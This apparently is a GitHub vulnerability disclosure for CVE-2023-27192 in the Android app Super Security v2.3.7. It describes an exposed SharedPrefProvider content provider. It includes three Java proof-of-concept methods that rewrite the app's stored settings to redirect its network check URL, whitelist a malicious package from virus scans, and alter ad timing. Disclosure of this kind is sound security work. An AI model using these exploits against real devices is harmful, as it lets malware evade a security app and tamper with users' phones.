Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Escalation of Privileges exists in Super Secuirty(CVE-2023-27192)

Vendor:DUALSPACE(http://www.dualspace.com/pc/en/products.html)

Affected product:Super Security (com.ludashi.security)

Version:2.3.7

Download link:https://apkpure.com/cn/super-security-virus-cleaner/com.ludashi.security

Description of the vulnerability for use in the CVE:An issue found in DUALSPACE Super Secuirty v.2.3.7 allows an attacker to gain privileges via the SharedPreference files.

Additional information:The app is a security application that provides several security-related functions. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Super Security app will not behave properly when loading this data. This can cause many security hazards, such as controlling the server URL the victim app is going to access (by modifying the key_wifi_safe_net_check_url field), allowing malicious apps to add themselves to the virus check whitelist (by modifying the KEY_VIRUS_SCAN_WHITELIST field), ad blocking (by modifying the key_ad_new_user_avoid_time field), and more. Even worse, users cannot fix the security issue by rebooting victim devices, since the injected data is persistent in the SharedPreference files.

1.Controlling the server URL the victim app is going to access:

poc:

public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name","__default__");
    contentValues.put("type",4);
    contentValues.put("key","key_wifi_safe_net_check_url");
    contentValues.put("value","www.xxx.com");
    contentResolver.update(uri, contentValues,null,null);
}

image-20230403194034307

2.Allowing malicious apps to add themselves to the virus scan whitelist:

poc:

public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name","__default__");
    contentValues.put("type",4);
    contentValues.put("key","KEY_VIRUS_SCAN_WHITELIST");
    contentValues.put("value","xxx.packagename");
    contentResolver.update(uri, contentValues,null,null);
}

KEY_VIRUS_SCAN_WHITELIST field:

image-20230403194034307

3.ad blocking

poc:

public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name","__default__");
    contentValues.put("type",2);
    contentValues.put("key","key_ad_new_user_avoid_time");
    contentValues.put("value","100000");
    contentResolver.update(uri, contentValues,null,null);
}

key_ad_new_user_avoid_time field:

image-20230404135013298